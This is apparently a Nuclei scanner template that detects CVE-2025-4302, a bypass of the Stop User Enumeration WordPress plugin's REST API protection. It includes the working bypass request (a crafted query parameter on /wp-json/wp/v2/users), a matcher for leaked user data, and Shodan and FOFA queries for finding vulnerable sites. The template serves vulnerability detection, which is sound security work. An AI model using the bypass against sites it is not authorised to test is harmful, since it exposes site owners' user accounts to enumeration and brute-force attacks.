id: CVE-2025-4302 info: name: Stop User Enumeration WordPress plugin - Authentication Bypass author: Kazgangap severity: medium description: | Stop User Enumeration WordPress plugin < 1.7.3 contains an authentication bypass caused by URL-encoding the REST API path /wp-json/wp/v2/users/, letting attackers bypass user enumeration restrictions, exploit requires crafted URL encoding. impact: | Attackers can bypass user enumeration protection through URL-encoding manipulation, potentially facilitating brute force attacks against user accounts. remediation: | Upgrade Stop User Enumeration WordPress plugin to version 1.7.3 or later that properly handles URL-encoded REST API paths. reference: - https://wpscan.com/vulnerability/19f67d6e-4ffe-4126-ac42-fb23c5017a3e/ - https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-4302.md - https://nvd.nist.gov/vuln/detail/CVE-2025-4302 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2025-4302 epss-score: 0.00847 epss-percentile: 0.53524 metadata: verified: true vendor: fullworks product: stop-user-enumeration framework: wordpress shodan-query: http.html:"/wp-content/plugins/stop-user-enumeration/" fofa-query: body=/wp-content/plugins/stop-user-enumeration/ publicwww-query: "/wp-content/plugins/stop-user-enumeration/" tags: cve,cve2025,wordpress,wp-plugin,wp,wpscan,stop-user-enumeration,vuln flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}/wp-json/wp/v2/users" matchers: - type: dsl dsl: - 'contains(body, "Only authenticated users can access the User endpoint REST API")' - 'status_code==401' condition: and internal: true - method: GET path: - "{{BaseURL}}/wp-json/wp/v2/users?foo=simple-jwt-login" matchers-condition: and matchers: - type: regex part: body regex: - '{"id":\d,"name":".*","url"' - type: word part: content_type words: - "application/json" - type: status status: - 200 # digest: 4a0a00473045022100b5facdb3c3af7de113249e1b44b159964e3487ea9eb830af524e14492fdaafd8022027a5cf6e1fc3f2c6033b7def054419df1e4914b3bb946870c65a99bd91e31d58:922c64590222798bb761d5b6d8e72950